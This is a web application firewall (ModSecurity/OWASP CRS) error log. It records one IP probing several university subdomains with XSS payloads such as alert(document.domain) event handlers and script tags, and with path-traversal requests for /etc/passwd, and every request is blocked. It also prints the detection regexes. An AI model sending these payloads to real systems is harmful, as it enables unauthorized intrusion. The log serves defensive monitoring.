[Tue Aug 29 11:52:34.636955 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAfWOO4AAAAL"]
[Tue Aug 29 11:52:34.638200 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoO5z8AAAAK"]
[Tue Aug 29 11:52:34.638754 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAlUltIAAAA0"]
[Tue Aug 29 11:52:34.640112 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoGFYsAAAAE"]
[Tue Aug 29 11:52:34.659014 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoQ3JQAAAAN"]
[Tue Aug 29 11:52:34.660247 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAfWOO8AAAAL"]
[Tue Aug 29 11:52:34.662065 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoGFYwAAAAE"]
[Tue Aug 29 11:52:34.673461 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoPuVgAAAAM"]
[Tue Aug 29 11:52:34.680431 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAnjjQYAAAAX"]
[Tue Aug 29 11:52:34.682428 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAlUltQAAAA0"]
[Tue Aug 29 11:52:34.695480 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoN9eUAAAAJ"]
[Tue Aug 29 11:52:34.696321 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15ksCo-f0AAAoPuVkAAAAM"]
[Tue Aug 29 11:52:35.585735 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15k8Co-f0AAAoO50QAAAAK"]
[Tue Aug 29 11:52:35.618956 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15k8Co-f0AAAfWOPQAAAAL"]
[Tue Aug 29 11:52:36.781626 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoT7McAAAAD"]
[Tue Aug 29 11:52:36.878861 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAnTlRcAAAAA"]
[Tue Aug 29 11:52:36.898304 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAnHQkkAAAAT"]
[Tue Aug 29 11:52:36.918516 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoT7MkAAAAD"]
[Tue Aug 29 11:52:37.540682 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnTlSIAAAAA"]
[Tue Aug 29 11:52:37.541831 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnd3IcAAAAI"]
[Tue Aug 29 11:52:37.557319 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoUJakAAAAB"]
[Tue Aug 29 11:52:37.557490 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAfWOPgAAAAL"]
[Tue Aug 29 11:52:37.561632 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnjjQ0AAAAX"]
[Tue Aug 29 11:52:37.562076 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnTlSMAAAAA"]
[Tue Aug 29 11:52:37.562772 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoGFZMAAAAE"]
[Tue Aug 29 11:52:37.570759 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoQ3KEAAAAN"]
[Tue Aug 29 11:52:37.592956 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoO50oAAAAK"]
[Tue Aug 29 11:52:37.619471 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAnjjQ8AAAAX"]
[Tue Aug 29 11:52:37.620253 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoUJasAAAAB"]
[Tue Aug 29 11:52:37.683662 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAfWOPwAAAAL"]
